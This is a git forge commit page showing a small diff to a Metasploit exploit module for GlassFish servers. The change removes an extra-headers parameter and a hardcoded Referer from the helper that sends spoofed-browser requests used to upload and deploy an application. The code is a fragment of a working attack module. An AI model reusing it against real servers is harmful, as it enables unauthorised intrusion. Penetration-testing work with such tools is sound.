adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Trim the fat

Browse Source
This commit is contained in:
wchen-r7
2016-08-30 15:56:51 -05:00
parent 1b505b9b67
commit 445a43bd97
1 changed files with 2 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/http/glassfish_deployer.rb
+2 -5
View File
@@ -63,18 +63,15 @@ class MetasploitModule < Msf::Exploit::Remote
#
# Send GET or POST request, and return the response
#
def send_glassfish_request(path, method, session='', data=nil, ctype=nil, new_headers={})
def send_glassfish_request(path, method, session='', data=nil, ctype=nil)
headers = {}
headers['Cookie'] = "JSESSIONID=#{session}" unless session.blank?
headers['Content-Type'] = ctype if ctype
headers['Connection'] = 'keep-alive'
headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0'
headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
headers['Accept-Language'] = 'en-US,en;q=0.5'
headers['Accept-Encoding'] = 'gzip, deflate, br'
headers.merge!(new_headers) unless new_headers.empty?
res = send_request_raw({
'uri' => path,
'method' => method,
@@ -622,7 +619,7 @@ class MetasploitModule < Msf::Exploit::Remote
path << '&bare=false'
end
res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype, {'Referer'=>'https://192.168.146.165:4848/common/applications/uploadFrame.jsf'})
res = send_glassfish_request(path, @verbs['POST'], session, post_data, ctype)
# Print upload result
if res && res.code == 302